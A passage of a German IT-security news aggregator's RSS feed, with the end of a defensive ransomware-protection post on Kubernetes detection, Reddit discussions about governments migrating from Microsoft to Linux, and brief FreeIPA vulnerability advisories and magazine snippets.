<p><span>Privileged Container or Host Namespace Access</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1611/" rel="noopener" target="_blank"><span>T1611 - Escape to Host</span></a></p>
</td>
<td>
<p><span>Monitor Kubernetes audit logs for pod creation or modification events requesting privileged security contexts, host namespace access, or volume mounts to sensitive host paths. These configurations allow container escape and direct access to the underlying worker node. Alert on any workload requesting these capabilities outside or pre-approved system namespaces.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Kubernetes Audit Logging or Security Agent Tampering</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1562/007/" rel="noopener" target="_blank"><span>T1562.007 - Impair Defenses: Disable or Modify Cloud Firewall</span></a></p>
</td>
<td>
<p><span>Monitor for modifications to Kubernetes API server audit policy configurations, deletion or redirection of log export sinks, and disablement or removal of container runtime security agents. Alert on changes to cluster-level logging configurations in managed services (GKE Cloud Audit Logs, EKS Control Plane Logging, AKS Diagnostic Settings) including disablement of API server, authenticator, or scheduler log streams.</span></p>
</td>
</tr>
</tbody>
</table></div></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div align="left"><span>Table 31: Detection opportunities for Kubernetes and CI/CD</span></div></div>
<div class="block-paragraph_advanced"><h3><span>Conclusion</span></h3>
<p><span>Destructive attacks, including ransomware, pose a serious threat to organizations. This blog post provides practical </span><span>guidance on protecting against common techniques used by threat actors for initial access, reconnaissance, privilege escalation, and mission objectives. This blog post should not be considered as a comprehensive defensive guide for every tactic, but it can serve as a valuable resource for organizations to prepare for such attacks. It is based on front-line expertise with helping organizations prepare, contain, eradicate, and recover from potentially destructive threat actors and incidents.</span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Linux in European PAs: How will they handle Enterprise Policies and AD-like management?]]></title>
<description><![CDATA[Hi everyone, with the recent news about several European Public Administrations (like France) making a decisive push toward Linux and Open Source, I’ve been thinking about the practical "sysadmin" side of things. In a massive Windows environment, we use Active Directory and Group Policy Objects (...]]></description>
<link>https://tsecurity.de/de/3433691/linux-tipps/linux-in-european-pas-how-will-they-handle-enterprise-policies-and-ad-like-management/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3433691/linux-tipps/linux-in-european-pas-how-will-they-handle-enterprise-policies-and-ad-like-management/</guid>
<pubDate>Wed, 15 Apr 2026 00:38:27 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hi everyone,</p> <p>with the recent news about several European Public Administrations (like France) making a decisive push toward Linux and Open Source, I’ve been thinking about the practical "sysadmin" side of things. In a massive Windows environment, we use <strong>Active Directory</strong> and <strong>Group Policy Objects (GPOs)</strong>, and now <strong>InTune</strong>, aka the backbone of everything, so identity management, security patches, hardware restrictions, and user permissions.</p> <p>When a government entity switches thousands of workstations to Linux, how do they replicate this? I’m curious to hear your thoughts or experiences on:</p> <ul> <li><strong>Identity Management:</strong> Will they lean on something like <strong>FreeIPA</strong> or <strong>Samba AD</strong>, or stick to an existing Azure/Entra ID backend via SSSD?</li> <li><strong>Policy Enforcement:</strong> How do they handle the equivalent of GPOs? Are we looking at heavy usage of Configuration Management tools like <strong>Ansible</strong>, <strong>SaltStack</strong>, or <strong>Puppet</strong>?</li> <li><strong>Fleet Management:</strong> Are there specific open-source tools robust enough to manage the compliance of 50k+ desktops (maybe something like <strong>Uyuni</strong> or <strong>Landscape</strong>)?</li> </ul> <p>Is the "Active Directory gap" still the biggest hurdle, or has the ecosystem matured enough that it’s no longer a dealbreaker for large-scale migrations like these?</p> <p>Looking forward to your insights, since I handle such tools in a big Windows ecosystem and I'm curious to hear about the alternatives on Linux!</p> <p>LLAP 🖖</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/nandospc"> /u/nandospc </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1sl06dv/linux_in_european_pas_how_will_they_handle/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1sl06dv/linux_in_european_pas_how_will_they_handle/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[What would it really take for EU governments and companies to migrate from Microsoft to Linux?]]></title>
<description><![CDATA[There’s increasing discussion in the EU about reducing dependency on US tech vendors, especially Microsoft. I was reading related posts and started wondering what the real blockers are when moving from a Microsoft-centric on-premise infrastructure to Linux, especially at medium/large company or g...]]></description>
<link>https://tsecurity.de/de/3170550/linux-tipps/what-would-it-really-take-for-eu-governments-and-companies-to-migrate-from-microsoft-to-linux/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3170550/linux-tipps/what-would-it-really-take-for-eu-governments-and-companies-to-migrate-from-microsoft-to-linux/</guid>
<pubDate>Sat, 20 Dec 2025 02:51:27 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>There’s increasing discussion in the EU about reducing dependency on US tech vendors, especially Microsoft. I was reading related posts and started wondering what the <em>real</em> blockers are when moving from a Microsoft-centric on-premise infrastructure to Linux, especially at medium/large company or government scale.</p> <p>A few challenges that immediately come to mind:</p> <p><strong>Identity and Access Management</strong></p> <p>Microsoft Active Directory is the backbone of most enterprises. Replacing it is possible (Samba AD, FreeIPA, LDAP), but it’s not a drop-in replacement:</p> <ul> <li>No full GPO equivalent</li> <li>Different management models</li> <li>Limited Windows client integration</li> <li>Higher operational complexity</li> </ul> <p><strong>Group Policy Objects</strong></p> <p>On Linux this becomes a mix of configuration management tools, scripts, and local policies, powerful, but fragmented and harder to audit. -&gt; Probably immutable systems like NixOS could be more effective for deploy configuration in a less complex manner?</p> <p><strong>Productivity &amp; collaboration</strong></p> <p>Replacing Microsoft 365 is not just swapping Word with LibreOffice:</p> <ul> <li>Excel macros (VBA) break</li> <li>Outlook/Exchange workflows are deeply embedded</li> <li>Teams, SharePoint, OneDrive, Power Automate could be integrated with LibreOffice/OpenOffice work, but not always <em>equivalently</em>, especially for power users.</li> </ul> <p><strong>Line-of-Business software</strong></p> <p>Many ERP, HR, accounting, CAD, legal and compliance tools are Windows-only or deeply tied to Microsoft APIs. This often blocks desktop migrations even when servers move to Linux.</p> <p><strong>Email &amp; Collaboration</strong></p> <p>Replacing Exchange requires rebuilding mail, calendar, contacts, mobile sync, archiving, and compliance tooling, all of which Microsoft delivers as a single ecosystem.</p> <p><strong>Endpoint Management &amp; Security</strong></p> <p>Microsoft provides Intune, Defender, BitLocker, Conditional Access, and Zero Trust tooling. Linux alternatives exist, but are fragmented and less integrated.</p> <p>Anything else?</p> <p>Can this migration be possible by the current available solutions? Or it is needed to create new solutions to fill the possible gaps?</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/D3vil0p"> /u/D3vil0p </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1pqpdgn/what_would_it_really_take_for_eu_governments_and/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1pqpdgn/what_would_it_really_take_for_eu_governments_and/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[[UPDATE] [hoch] Red Hat Enterprise Linux (FreeIPA): Schwachstelle ermöglicht Erlangen von Administratorrechten]]></title>
<description><![CDATA[Ein lokaler oder entfernter, authentisierter Angreifer kann eine Schwachstelle in Red Hat Enterprise Linux ausnutzen, um Administratorrechte zu erlangen.]]></description>
<link>https://tsecurity.de/de/3096046/it-security-nachrichten/update-hoch-red-hat-enterprise-linux-freeipa-schwachstelle-ermoeglicht-erlangen-von-administratorrechten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3096046/it-security-nachrichten/update-hoch-red-hat-enterprise-linux-freeipa-schwachstelle-ermoeglicht-erlangen-von-administratorrechten/</guid>
<pubDate>Thu, 13 Nov 2025 12:39:51 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein lokaler oder entfernter, authentisierter Angreifer kann eine Schwachstelle in Red Hat Enterprise Linux ausnutzen, um Administratorrechte zu erlangen.]]></content:encoded>
</item>
<item>
<title><![CDATA[[UPDATE] [hoch] Red Hat Enterprise Linux (freeIPA): Schwachstelle ermöglicht Privilegieneskalation]]></title>
<description><![CDATA[Ein entfernter, authentisierter Angreifer kann eine Schwachstelle im freeIPA Paket von Red Hat Enterprise Linux ausnutzen, um seine Privilegien zu erhöhen.]]></description>
<link>https://tsecurity.de/de/3096023/it-security-nachrichten/update-hoch-red-hat-enterprise-linux-freeipa-schwachstelle-ermoeglicht-privilegieneskalation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3096023/it-security-nachrichten/update-hoch-red-hat-enterprise-linux-freeipa-schwachstelle-ermoeglicht-privilegieneskalation/</guid>
<pubDate>Thu, 13 Nov 2025 12:39:14 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein entfernter, authentisierter Angreifer kann eine Schwachstelle im freeIPA Paket von Red Hat Enterprise Linux ausnutzen, um seine Privilegien zu erhöhen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (idm:DL1), Debian (gegl and haproxy), Fedora (ffmpeg, firefox, freeipa, python-pip, rust-astral-tokio-tar, sqlite, uv, webkitgtk, and xen), Oracle (idm:DL1, ipa, kernel, perl-JSON-XS, and python3), Red Hat (git), SUSE (curl, frr, jupyter-jupyterlab, ...]]></description>
<link>https://tsecurity.de/de/3019100/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3019100/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 03 Oct 2025 15:34:44 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (idm:DL1), <b>Debian</b> (gegl and haproxy), <b>Fedora</b> (ffmpeg, firefox, freeipa, python-pip, rust-astral-tokio-tar, sqlite, uv, webkitgtk, and xen), <b>Oracle</b> (idm:DL1, ipa, kernel, perl-JSON-XS, and python3), <b>Red Hat</b> (git), <b>SUSE</b> (curl, frr, jupyter-jupyterlab, and libsuricata8_0_1), and <b>Ubuntu</b> (linux-aws, linux-lts-xenial, linux-aws-fips, linux-fips, linux-gcp-fips, linux-azure, linux-azure, linux-azure-6.8, linux-fips, linux-gcp-fips, and linux-intel-iot-realtime, linux-realtime).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Ausführen von Code mit höheren Privilegien in freeipa (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3018444/unix-server/security-ausfuehren-von-code-mit-hoeheren-privilegien-in-freeipa-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3018444/unix-server/security-ausfuehren-von-code-mit-hoeheren-privilegien-in-freeipa-fedora/</guid>
<pubDate>Fri, 03 Oct 2025 08:07:03 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Ausführen von Code mit höheren Privilegien in freeipa (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3018442/unix-server/security-ausfuehren-von-code-mit-hoeheren-privilegien-in-freeipa-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3018442/unix-server/security-ausfuehren-von-code-mit-hoeheren-privilegien-in-freeipa-fedora/</guid>
<pubDate>Fri, 03 Oct 2025 08:07:00 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Ausführen von Code mit höheren Privilegien in freeipa (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3018440/unix-server/security-ausfuehren-von-code-mit-hoeheren-privilegien-in-freeipa-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3018440/unix-server/security-ausfuehren-von-code-mit-hoeheren-privilegien-in-freeipa-fedora/</guid>
<pubDate>Fri, 03 Oct 2025 08:06:57 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-7493 | Red Hat Enterprise Linux 6/7/8/9/10 FreeIPA insufficient granularity of access control (EUVD-2025-31739)]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in Red Hat Enterprise Linux 6/7/8/9/10. The affected element is an unknown function of the component FreeIPA. Such manipulation leads to insufficient granularity of access control.

This vulnerability is referenced as CVE-2025-7493. It is possibl...]]></description>
<link>https://tsecurity.de/de/3013403/sicherheitsluecken/cve-2025-7493-red-hat-enterprise-linux-678910-freeipa-insufficient-granularity-of-access-control-euvd-2025-31739/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3013403/sicherheitsluecken/cve-2025-7493-red-hat-enterprise-linux-678910-freeipa-insufficient-granularity-of-access-control-euvd-2025-31739/</guid>
<pubDate>Tue, 30 Sep 2025 19:38:09 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/?kb.risk">critical</a> has been found in <a href="https://vuldb.com/?product.red_hat:enterprise_linux">Red Hat Enterprise Linux 6/7/8/9/10</a>. The affected element is an unknown function of the component <em>FreeIPA</em>. Such manipulation leads to insufficient granularity of access control.

This vulnerability is referenced as <a href="https://vuldb.com/?source_cve.326421">CVE-2025-7493</a>. It is possible to launch the attack remotely. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Rechenzentren per Klick - IT-Administrator.de]]></title>
<description><![CDATA[Dabei sollen die Server vor Quanten-Hacks sicher sein und deutliche ... Windows Server 2022: Domaincontroller reparieren (1) · Fachartikel.]]></description>
<link>https://tsecurity.de/de/3010705/windows-server/rechenzentren-per-klick-it-administratorde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3010705/windows-server/rechenzentren-per-klick-it-administratorde/</guid>
<pubDate>Mon, 29 Sep 2025 16:05:49 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Dabei sollen die Server vor Quanten-Hacks sicher sein und deutliche ... <b>Windows Server</b> 2022: Domaincontroller reparieren (1) · Fachartikel.]]></content:encoded>
</item>
<item>
<title><![CDATA[Download der Woche: Proton Authenticator - IT-Administrator.de]]></title>
<description><![CDATA[Windows Server 2022: Domaincontroller reparieren (1) · Fachartikel ... IT-Administrator Seminare. Windows Server 2025. 2025-11-10 - 2025-11-12.]]></description>
<link>https://tsecurity.de/de/2933040/windows-server/download-der-woche-proton-authenticator-it-administratorde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2933040/windows-server/download-der-woche-proton-authenticator-it-administratorde/</guid>
<pubDate>Mon, 11 Aug 2025 09:44:27 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<b>Windows Server</b> 2022: Domaincontroller reparieren (1) · Fachartikel ... IT-Administrator Seminare. <b>Windows Server</b> 2025. 2025-11-10 - 2025-11-12.]]></content:encoded>
</item>
<item>
<title><![CDATA[Software mit Hintertür: Supply-Chain-Angriffe abwehren | IT-Administrator Magazin]]></title>
<description><![CDATA[Windows Server 2022: Domaincontroller reparieren (1) · Fachartikel · Zur Gefahrenidentifikation und -abwehr können sich Unternehmen mit mehreren ...]]></description>
<link>https://tsecurity.de/de/2905825/windows-server/software-mit-hintertuer-supply-chain-angriffe-abwehren-it-administrator-magazin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2905825/windows-server/software-mit-hintertuer-supply-chain-angriffe-abwehren-it-administrator-magazin/</guid>
<pubDate>Fri, 25 Jul 2025 14:05:50 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<b>Windows Server</b> 2022: Domaincontroller reparieren (1) · Fachartikel · Zur Gefahrenidentifikation und -abwehr können sich Unternehmen mit mehreren ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Tech Talk: Dedizierte Exchange Hybrid Applikation - IT-Administrator.de]]></title>
<description><![CDATA[Windows Server 2022: Domaincontroller reparieren (1) · Fachartikel. IT-Administrator Seminare. Gruppenrichtlinien. 2025-09-22 - 2025-09-24. Azure ...]]></description>
<link>https://tsecurity.de/de/2902348/windows-server/tech-talk-dedizierte-exchange-hybrid-applikation-it-administratorde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2902348/windows-server/tech-talk-dedizierte-exchange-hybrid-applikation-it-administratorde/</guid>
<pubDate>Wed, 23 Jul 2025 17:05:32 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<b>Windows Server</b> 2022: Domaincontroller reparieren (1) · Fachartikel. IT-Administrator Seminare. Gruppenrichtlinien. 2025-09-22 - 2025-09-24. Azure ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Ausführen von Code mit höheren Privilegien in freeipa (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/2892068/it-security-nachrichten/ausfuehren-von-code-mit-hoeheren-privilegien-in-freeipa-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2892068/it-security-nachrichten/ausfuehren-von-code-mit-hoeheren-privilegien-in-freeipa-fedora/</guid>
<pubDate>Thu, 17 Jul 2025 11:04:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Security: Preisgabe von Informationen in freeipa (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/2889534/unix-server/security-preisgabe-von-informationen-in-freeipa-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2889534/unix-server/security-preisgabe-von-informationen-in-freeipa-fedora/</guid>
<pubDate>Wed, 16 Jul 2025 11:34:11 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Preisgabe von Informationen in freeipa (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/2889533/unix-server/security-preisgabe-von-informationen-in-freeipa-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2889533/unix-server/security-preisgabe-von-informationen-in-freeipa-fedora/</guid>
<pubDate>Wed, 16 Jul 2025 11:34:10 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Angriff ohne Passwort: Kritische Cisco-Schwachstelle | IT-Administrator Magazin]]></title>
<description><![CDATA[Windows Server 2022: Domaincontroller reparieren (1) · Fachartikel. IT-Administrator Seminare. Mit Bordmitteln gegen Ransomware. 2025-09-25 - 2025-09 ...]]></description>
<link>https://tsecurity.de/de/2866568/windows-server/angriff-ohne-passwort-kritische-cisco-schwachstelle-it-administrator-magazin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2866568/windows-server/angriff-ohne-passwort-kritische-cisco-schwachstelle-it-administrator-magazin/</guid>
<pubDate>Thu, 03 Jul 2025 18:05:57 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<b>Windows Server</b> 2022: Domaincontroller reparieren (1) · Fachartikel. IT-Administrator Seminare. Mit Bordmitteln gegen Ransomware. 2025-09-25 - 2025-09 ...]]></content:encoded>
</item>
<item>
<title><![CDATA[What Happens When Log Files Vanish Forever?]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 When cybersecurity expert Neil Desai had just minutes to react before logs vanished, every second mattered. This short dives into how timing and asset priority shape real-world incident response. From 7-minute failover windows to ...]]></description>
<link>https://tsecurity.de/de/2854022/it-security-video/what-happens-when-log-files-vanish-forever/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2854022/it-security-video/what-happens-when-log-files-vanish-forever/</guid>
<pubDate>Thu, 26 Jun 2025 22:04:37 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<enclosure url="https://i.ytimg.com/vi/NQH7ZTl8dZY/maxresdefault.jpg" length="0" type="image/jpeg" />
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/NQH7ZTl8dZY?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>When cybersecurity expert Neil Desai had just minutes to react before logs vanished, every second mattered. This short dives into how timing and asset priority shape real-world incident response. From 7-minute failover windows to remote sites with 20-day delays, it's a chilling reminder of how fast threats move—and how prepared you need to be.<br />
<br />
→Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
→Join our community Discord: https://securityweekly.com/discord<br />
<br />
#CyberSecurity #IncidentResponse #LogFiles #DigitalForensics #DomainController #Shorts #TechShorts #InfoSec #SOC #BlueTeam #TechTok #ITlife #SecurityOps #CyberThreats #NetworkSecurity #CyberAttack #CyberAwareness #HackerPrevention<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-4404 | Red Hat Enterprise Linux 6/7/8/9/10 FreeIPA insufficient granularity of access control (RHSA-2025:9185 / EUVD-2025-18495)]]></title>
<description><![CDATA[A vulnerability was found in Red Hat Enterprise Linux 6/7/8/9/10 and classified as critical. Affected by this issue is some unknown functionality of the component FreeIPA. The manipulation leads to insufficient granularity of access control.

This vulnerability is handled as CVE-2025-4404. The at...]]></description>
<link>https://tsecurity.de/de/2836813/sicherheitsluecken/cve-2025-4404-red-hat-enterprise-linux-678910-freeipa-insufficient-granularity-of-access-control-rhsa-20259185-euvd-2025-18495/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2836813/sicherheitsluecken/cve-2025-4404-red-hat-enterprise-linux-678910-freeipa-insufficient-granularity-of-access-control-rhsa-20259185-euvd-2025-18495/</guid>
<pubDate>Tue, 17 Jun 2025 18:08:00 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.red_hat:enterprise_linux">Red Hat Enterprise Linux 6/7/8/9/10</a> and classified as <a href="https://vuldb.com/?kb.risk">critical</a>. Affected by this issue is some unknown functionality of the component <em>FreeIPA</em>. The manipulation leads to insufficient granularity of access control.

This vulnerability is handled as <a href="https://vuldb.com/?source_cve.312710">CVE-2025-4404</a>. The attack may be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Mehr Klarheit im Netz | IT-Administrator Magazin]]></title>
<description><![CDATA[Windows Server 2022: Domaincontroller reparieren (1) · Fachartikel. IT-Administrator Seminare. Gruppenrichtlinien. 2025-06-03 - 2025-06-05.]]></description>
<link>https://tsecurity.de/de/2807076/windows-server/mehr-klarheit-im-netz-it-administrator-magazin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2807076/windows-server/mehr-klarheit-im-netz-it-administrator-magazin/</guid>
<pubDate>Fri, 30 May 2025 19:48:39 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<b>Windows Server</b> 2022: Domaincontroller reparieren (1) · Fachartikel. IT-Administrator Seminare. Gruppenrichtlinien. 2025-06-03 - 2025-06-05.]]></content:encoded>
</item>
<item>
<title><![CDATA[Kaspersky wappnet den Mittelstand | IT-Administrator Magazin]]></title>
<description><![CDATA[... Microsoft-Office-365-Anwendungen. Waldemar Bergstreiser, General ... Windows Server 2022: Domaincontroller reparieren (1) · Fachartikel · Zur ...]]></description>
<link>https://tsecurity.de/de/2760771/windows-server/kaspersky-wappnet-den-mittelstand-it-administrator-magazin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2760771/windows-server/kaspersky-wappnet-den-mittelstand-it-administrator-magazin/</guid>
<pubDate>Tue, 06 May 2025 17:52:18 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... Microsoft-Office-365-Anwendungen. Waldemar Bergstreiser, General ... <b>Windows Server</b> 2022: Domaincontroller reparieren (1) · Fachartikel · Zur ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows-Updates: Netzwerkprobleme bei Domaincontrollern und Windows-11-BSoDs]]></title>
<description><![CDATA[Microsoft hat weitere Probleme mit Windows-Updates eingeräumt. Domaincontroller bekommen Netzprobleme, Windows 11 kann abstürzen.]]></description>
<link>https://tsecurity.de/de/2729594/it-nachrichten/windows-updates-netzwerkprobleme-bei-domaincontrollern-und-windows-11-bsods/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2729594/it-nachrichten/windows-updates-netzwerkprobleme-bei-domaincontrollern-und-windows-11-bsods/</guid>
<pubDate>Thu, 17 Apr 2025 11:15:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Microsoft hat weitere Probleme mit Windows-Updates eingeräumt. Domaincontroller bekommen Netzprobleme, Windows 11 kann abstürzen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows-Update-Probleme: Netzwerk bei Domaincontrollern und Windows-11-BSoDs]]></title>
<description><![CDATA[Microsoft hat weitere Probleme mit Windows-Updates eingeräumt. Domaincontroller bekommen Netzprobleme, Windows 11 kann abstürzen.]]></description>
<link>https://tsecurity.de/de/2729578/it-security-nachrichten/windows-update-probleme-netzwerk-bei-domaincontrollern-und-windows-11-bsods/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2729578/it-security-nachrichten/windows-update-probleme-netzwerk-bei-domaincontrollern-und-windows-11-bsods/</guid>
<pubDate>Thu, 17 Apr 2025 11:03:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Microsoft hat weitere Probleme mit Windows-Updates eingeräumt. Domaincontroller bekommen Netzprobleme, Windows 11 kann abstürzen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Container-Hafen | IT-Administrator Magazin]]></title>
<description><![CDATA[Zudem ist jetzt eine Konfiguration des API-Server-Diensttyps möglich. ... Windows Server 2022: Domaincontroller reparieren (1) · Fachartikel · Zur ...]]></description>
<link>https://tsecurity.de/de/2700121/windows-server/container-hafen-it-administrator-magazin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2700121/windows-server/container-hafen-it-administrator-magazin/</guid>
<pubDate>Tue, 01 Apr 2025 22:50:10 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Zudem ist jetzt eine Konfiguration des API-Server-Diensttyps möglich. ... <b>Windows Server</b> 2022: Domaincontroller reparieren (1) · Fachartikel · Zur ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Vorbeugender Schutz dank quantenbasiertem Antivirus | IT-Administrator Magazin]]></title>
<description><![CDATA[Derzeit unterstützt werden Windows 11, diverse Linux-Derivate sowie experimentell auch macOS Sonoma. ... Windows Server 2022: Domaincontroller ...]]></description>
<link>https://tsecurity.de/de/2699742/windows-server/vorbeugender-schutz-dank-quantenbasiertem-antivirus-it-administrator-magazin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2699742/windows-server/vorbeugender-schutz-dank-quantenbasiertem-antivirus-it-administrator-magazin/</guid>
<pubDate>Tue, 01 Apr 2025 18:20:32 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Derzeit unterstützt werden Windows 11, diverse Linux-Derivate sowie experimentell auch macOS Sonoma. ... <b>Windows Server</b> 2022: Domaincontroller ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Zugangskontrolle | IT-Administrator Magazin]]></title>
<description><![CDATA[Windows Server 2022: Domaincontroller reparieren (1) · Fachartikel. IT-Administrator Seminare. Erweiterte Sicherheit in Microsoft 365. 2025-04-02 ...]]></description>
<link>https://tsecurity.de/de/2696694/windows-server/zugangskontrolle-it-administrator-magazin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2696694/windows-server/zugangskontrolle-it-administrator-magazin/</guid>
<pubDate>Mon, 31 Mar 2025 13:18:46 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<b>Windows Server</b> 2022: Domaincontroller reparieren (1) · Fachartikel. IT-Administrator Seminare. Erweiterte Sicherheit in Microsoft 365. 2025-04-02 ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Sandbox ausgehebelt: Chrome-Nutzer in Gefahr | IT-Administrator Magazin]]></title>
<description><![CDATA[Windows Server 2022: Domaincontroller reparieren (1) · Fachartikel. IT-Administrator Seminare. Windows Server 2025. 2025-05-26 - 2025-05-28. Sichere ...]]></description>
